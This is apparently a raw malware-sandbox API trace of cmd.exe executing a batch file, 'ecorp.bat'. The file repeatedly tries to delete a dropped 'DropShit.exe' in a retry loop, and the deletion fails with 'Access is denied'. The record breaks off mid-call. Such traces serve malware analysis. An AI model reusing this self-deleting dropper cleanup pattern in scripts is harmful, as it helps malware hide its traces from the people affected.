[0091.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.755] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.755] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.755] SetConsoleInputExeNameW () returned 0x1 [0091.755] GetConsoleOutputCP () returned 0x1b5 [0091.755] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.755] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.755] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.755] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.755] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.755] GetProcessHeap () returned 0x250000 [0091.755] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.755] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a80 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a40 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.756] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.756] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.756] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.756] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0091.756] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.756] GetFileType (hFile=0x5c) returned 0x1 [0091.756] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.756] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.756] GetProcessHeap () returned 0x250000 [0091.756] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.756] GetProcessHeap () returned 0x250000 [0091.756] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.757] GetProcessHeap () returned 0x250000 [0091.757] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.757] GetProcessHeap () returned 0x250000 [0091.757] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.757] GetProcessHeap () returned 0x250000 [0091.757] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.757] _tell (_FileHandle=3) returned 29 [0091.757] _close (_FileHandle=3) returned 0 [0091.757] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.757] GetFileType (hFile=0x7) returned 0x2 [0091.757] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.757] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.758] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.758] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.758] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.758] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.758] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.758] GetFileType (hFile=0x7) returned 0x2 [0091.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.758] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.758] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.759] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.759] GetFileType (hFile=0x7) returned 0x2 [0091.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.759] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.759] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.759] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.759] GetFileType (hFile=0x7) returned 0x2 [0091.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.760] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.760] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.760] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.760] GetFileType (hFile=0x7) returned 0x2 [0091.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.760] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.760] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.761] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.761] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.761] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.761] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x251980 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251980, Size=0x30) returned 0x251980 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251980) returned 0x30 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x2519c0 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2519c0, Size=0x30) returned 0x2519c0 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2519c0) returned 0x30 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.761] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.761] GetProcessHeap () returned 0x250000 [0091.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a00 [0091.761] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.761] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.761] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.761] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a60 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x251ac0 [0091.762] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.762] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.762] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x26ccf0 [0091.762] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26cd00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.762] SetErrorMode (uMode=0x0) returned 0x0 [0091.762] SetErrorMode (uMode=0x1) returned 0x0 [0091.762] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.762] SetErrorMode (uMode=0x0) returned 0x1 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26cf10 [0091.762] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.762] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.762] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x251d30 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26d180 [0091.762] GetProcessHeap () returned 0x250000 [0091.762] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26d1f0 [0091.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26d204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26d204) returned 0x26da10 [0091.762] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.763] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.763] GetLastError () returned 0x5 [0091.763] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.763] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.763] GetFileType (hFile=0x7) returned 0x2 [0091.763] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.763] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.763] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.763] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.763] _get_osfhandle (_FileHandle=2) returned 0xb [0091.764] GetFileType (hFile=0xb) returned 0x2 [0091.764] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.764] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.764] _get_osfhandle (_FileHandle=2) returned 0xb [0091.764] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.764] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.764] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.764] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.764] FindNextFileW (in: hFindFile=0x26da10, lpFindFileData=0x26d204 | out: lpFindFileData=0x26d204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.765] GetLastError () returned 0x12 [0091.765] FindClose (in: hFindFile=0x26da10 | out: hFindFile=0x26da10) returned 1 [0091.765] GetProcessHeap () returned 0x250000 [0091.765] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d1f0 | out: hHeap=0x250000) returned 1 [0091.765] GetProcessHeap () returned 0x250000 [0091.765] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d180 | out: hHeap=0x250000) returned 1 [0091.765] GetProcessHeap () returned 0x250000 [0091.765] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251d30 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf10 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251ac0 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a60 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a00 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.766] GetProcessHeap () returned 0x250000 [0091.766] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2519c0 | out: hHeap=0x250000) returned 1 [0091.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.766] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.767] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.767] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.767] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.767] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.767] SetConsoleInputExeNameW () returned 0x1 [0091.767] GetConsoleOutputCP () returned 0x1b5 [0091.767] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.767] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.768] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.768] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.768] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.768] GetProcessHeap () returned 0x250000 [0091.768] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.768] GetProcessHeap () returned 0x250000 [0091.768] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.768] GetProcessHeap () returned 0x250000 [0091.768] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.768] GetProcessHeap () returned 0x250000 [0091.768] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.768] GetProcessHeap () returned 0x250000 [0091.768] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.768] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.768] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.768] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.768] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.768] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.768] GetFileType (hFile=0x5c) returned 0x1 [0091.768] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.768] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.768] GetProcessHeap () returned 0x250000 [0091.768] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.768] GetProcessHeap () returned 0x250000 [0091.769] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x264610 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x264610, Size=0x1e) returned 0x2645e0 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2645e0) returned 0x1e [0091.769] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251980 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x264610 [0091.769] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.769] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x251a40 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251a40, Size=0x30) returned 0x251a40 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251a40) returned 0x30 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251a80 [0091.769] GetProcessHeap () returned 0x250000 [0091.769] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.770] GetProcessHeap () returned 0x250000 [0091.770] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.770] _tell (_FileHandle=3) returned 66 [0091.770] _close (_FileHandle=3) returned 0 [0091.770] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.770] GetFileType (hFile=0x7) returned 0x2 [0091.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.770] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.770] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.771] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.771] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.771] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.771] GetFileType (hFile=0x7) returned 0x2 [0091.771] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.771] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: 